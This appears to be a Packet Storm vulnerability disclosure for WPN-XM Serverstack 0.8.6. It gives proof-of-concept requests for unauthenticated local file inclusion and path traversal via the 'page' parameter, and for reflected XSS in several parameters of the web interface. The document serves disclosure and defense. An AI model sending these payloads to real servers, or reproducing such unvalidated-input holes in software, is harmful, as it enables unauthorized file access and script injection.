exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WPN-XM Serverstack For Windows 0.8.6 XSS / LFI / Traversal

WPN-XM Serverstack For Windows 0.8.6 XSS / LFI / Traversal
Posted Mar 27, 2023
Authored by Rafael Pedrero

WPN-XM Serverstack for Windows version 0.8.6 suffers from cross site scripting, local file inclusion, and path traversal vulnerabilities.

tags | exploit, local, vulnerability, xss, file inclusion
systems | windows
SHA-256 | ba0708cc5dc30c248dff73fe133d54a07726c0ef4f797720b6548f5184c612f3

WPN-XM Serverstack For Windows 0.8.6 XSS / LFI / Traversal

Change Mirror Download
# Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-13
# Vendor Homepage: http://wpn-xm.org/
# Software Link : https://github.com/WPN-XM/WPN-XM/
# Tested Version: 0.8.6
# Tested on: Windows 10 using XAMPP

# Vulnerability Type: Local File Inclusion (LFI) & directory traversal
(path traversal)

CVSS v3: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-829, CWE-22

Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows
unauthenticated directory traversal and Local File Inclusion through the
parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello
(without php) GET request.

Proof of concept:

To detect: http://localhost/tools/webinterface/index.php?page=)

The parameter "page" can be modified and load a php file in the server.

Example, In C:\:hello.php with this content:

C:\>type hello.php
<?php
echo "HELLO FROM C:\\hello.php";
?>


To Get hello.php in c:\ :
http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello

Note: hello without ".php".

And you can see the PHP message into the browser at the start.

Response:

HELLO FROM C:\hello.php<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta charset="utf-8" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">

<title>WP?-XM Server Stack for Windows - 0.8.6</title>
<meta name="description" content="WP?-XM Server Stack for Windows -
Webinterface.">
<meta name="author" content="Jens-André Koch" />
<link rel="shortcut icon" href="favicon.ico" />



# Vulnerability Type: reflected Cross-Site Scripting (XSS)

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the
/tools/webinterface/index.php, in multiple parameters.

Proof of concept:

http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help
http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help
http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close